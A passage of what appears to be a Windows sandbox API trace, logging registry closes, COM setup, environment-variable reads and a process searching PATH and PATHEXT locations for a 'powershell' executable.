	[0699.156] RegCloseKey (hKey=0x300) returned 0x0
	[0699.156] RegCloseKey (hKey=0x2fc) returned 0x0
	[0699.157] RegCloseKey (hKey=0x310) returned 0x0
	[0699.157] RegCloseKey (hKey=0x30c) returned 0x0
	[0699.157] RegCloseKey (hKey=0x388) returned 0x0
	[0699.157] RegCloseKey (hKey=0x324) returned 0x0
	[0782.568] RegCloseKey (hKey=0x348) returned 0x0

Thread:
	id = 1089
	os_tid = 0x15b4


Thread:
	id = 1292
	os_tid = 0x15b4


Thread:
	id = 1487
	os_tid = 0x1c8c

	[0733.875] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0733.880] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0733.885] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0733.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.885] CoTaskMemFree (pv=0x31a530) 
	[0733.886] VirtualQuery (in: lpAddress=0x1c73d840, lpBuffer=0x1c73e700, dwLength=0x30 | out: lpBuffer=0x1c73e700*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0733.890] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0733.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.890] CoTaskMemFree (pv=0x31a530) 
	[0733.893] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0733.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.893] CoTaskMemFree (pv=0x31a530) 
	[0733.896] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0733.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.896] CoTaskMemFree (pv=0x31a530) 
	[0733.918] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0733.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.918] CoTaskMemFree (pv=0x31a530) 
	[0735.416] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.416] CoTaskMemFree (pv=0x31a530) 
	[0735.421] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.421] CoTaskMemFree (pv=0x31a530) 
	[0735.426] VirtualQuery (in: lpAddress=0x1c73daf0, lpBuffer=0x1c73e9b0, dwLength=0x30 | out: lpBuffer=0x1c73e9b0*(BaseAddress=0x1c73d000, AllocationBase=0x1bdb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0735.427] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.427] CoTaskMemFree (pv=0x31a530) 
	[0735.429] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.430] CoTaskMemFree (pv=0x31a530) 
	[0735.430] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.430] CoTaskMemFree (pv=0x31a530) 
	[0735.431] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.431] CoTaskMemFree (pv=0x31a530) 
	[0735.436] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0735.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.436] CoTaskMemFree (pv=0x31a530) 
	[0736.771] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0736.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.771] CoTaskMemFree (pv=0x31a530) 
	[0736.774] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0736.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.774] CoTaskMemFree (pv=0x31a530) 
	[0738.336] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0738.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.336] CoTaskMemFree (pv=0x31a530) 
	[0738.338] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0738.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.339] CoTaskMemFree (pv=0x31a530) 
	[0738.340] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0738.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.340] CoTaskMemFree (pv=0x31a530) 
	[0738.342] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0738.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.342] CoTaskMemFree (pv=0x31a530) 
	[0738.344] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0738.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.344] CoTaskMemFree (pv=0x31a530) 
	[0738.371] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0738.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.371] CoTaskMemFree (pv=0x31a530) 
	[0741.342] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0741.342] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0741.342] CoTaskMemFree (pv=0x31a530) 
	[0741.345] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0741.345] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0741.345] CoTaskMemFree (pv=0x31a530) 
	[0741.345] CoTaskMemAlloc (cb=0x128) returned 0x25fe90
	[0741.345] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x25fe90, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0741.345] CoTaskMemFree (pv=0x25fe90) 
	[0741.350] CoTaskMemAlloc (cb=0x20e) returned 0x1b79d370
	[0741.350] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b79d370 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0741.350] CoTaskMemFree (pv=0x1b79d370) 
	[0741.354] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0741.355] SetErrorMode (uMode=0x1) returned 0x1
	[0741.358] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0742.679] SetErrorMode (uMode=0x1) returned 0x1
	[0742.681] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0742.681] SetErrorMode (uMode=0x1) returned 0x1
	[0742.681] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0742.692] SetErrorMode (uMode=0x1) returned 0x1
	[0742.693] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0742.693] SetErrorMode (uMode=0x1) returned 0x1
	[0742.693] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0742.702] SetErrorMode (uMode=0x1) returned 0x1
	[0742.703] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0742.705] SetErrorMode (uMode=0x1) returned 0x1
	[0742.705] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0742.713] SetErrorMode (uMode=0x1) returned 0x1
	[0742.714] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0742.715] SetErrorMode (uMode=0x1) returned 0x1
	[0742.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0744.128] SetErrorMode (uMode=0x1) returned 0x1
	[0744.129] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0744.129] SetErrorMode (uMode=0x1) returned 0x1
	[0744.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0744.138] SetErrorMode (uMode=0x1) returned 0x1
	[0744.139] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0744.139] SetErrorMode (uMode=0x1) returned 0x1
	[0744.139] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0744.147] SetErrorMode (uMode=0x1) returned 0x1
	[0744.149] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0744.149] SetErrorMode (uMode=0x1) returned 0x1
	[0744.149] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.422] SetErrorMode (uMode=0x1) returned 0x1
	[0745.423] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0745.423] SetErrorMode (uMode=0x1) returned 0x1
	[0745.423] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.432] SetErrorMode (uMode=0x1) returned 0x1
	[0745.433] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0745.433] SetErrorMode (uMode=0x1) returned 0x1
	[0745.433] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.444] SetErrorMode (uMode=0x1) returned 0x1
	[0745.446] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0745.447] SetErrorMode (uMode=0x1) returned 0x1
	[0745.447] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0745.455] SetErrorMode (uMode=0x1) returned 0x1
	[0745.457] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0745.457] SetErrorMode (uMode=0x1) returned 0x1
	[0745.457] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.791] SetErrorMode (uMode=0x1) returned 0x1
	[0746.792] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0746.793] SetErrorMode (uMode=0x1) returned 0x1
	[0746.793] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.800] SetErrorMode (uMode=0x1) returned 0x1
	[0746.802] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0746.802] SetErrorMode (uMode=0x1) returned 0x1
	[0746.802] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.819] SetErrorMode (uMode=0x1) returned 0x1
	[0746.820] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0746.820] SetErrorMode (uMode=0x1) returned 0x1
	[0746.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.828] SetErrorMode (uMode=0x1) returned 0x1
	[0746.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.830] SetErrorMode (uMode=0x1) returned 0x1
	[0746.830] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.830] SetErrorMode (uMode=0x1) returned 0x1
	[0746.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.831] SetErrorMode (uMode=0x1) returned 0x1
	[0746.831] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.831] SetErrorMode (uMode=0x1) returned 0x1
	[0746.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.832] SetErrorMode (uMode=0x1) returned 0x1
	[0746.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.832] SetErrorMode (uMode=0x1) returned 0x1
	[0746.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.832] SetErrorMode (uMode=0x1) returned 0x1
	[0746.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.833] SetErrorMode (uMode=0x1) returned 0x1
	[0746.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.833] SetErrorMode (uMode=0x1) returned 0x1
